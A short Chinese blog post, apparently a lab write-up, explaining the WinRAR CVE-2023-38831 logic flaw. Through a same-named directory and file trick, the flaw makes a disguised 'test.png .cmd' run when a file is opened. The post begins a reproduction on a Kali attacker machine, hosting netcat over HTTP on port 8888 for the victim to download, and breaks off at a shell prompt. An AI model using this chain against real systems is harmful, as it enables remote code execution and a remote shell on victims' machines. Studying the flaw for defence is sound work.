CVE-2023-38831
漏洞原理
CVE-2023-38831 WinRAR 逻辑漏洞原因分析-CSDN博客
winrar版本<6.2.2
1、当受害者尝试打开存档文件中的"test.png "时,WinRAR会比较存档中的所有文件以查找与"test.png "同名的文件/目录
2、如果存在与"test.png "同名的目录,WinRAR则会继续检查"test.png /"目录下的文件
3、如果"test.png /"目录下同样存在文件名为"test.png "的文件则将"test.png /"目录下"test.png "文件放入提取列表中
4、最终导致压缩包中的test.png .cmd被解压出来,并且运行
漏洞复现
攻击机(kali)
在nc同目录下启动http服务(使受害者通过连接来下载nc)
python2:python -m SimpleHTTPServer 8888
python3:python -m http.server 8888
┌──(root
标签:exe,8888,192.168,nc64,test,RCE,winRAR,png
From: https://www.cnblogs.com/qgg4588/p/18104849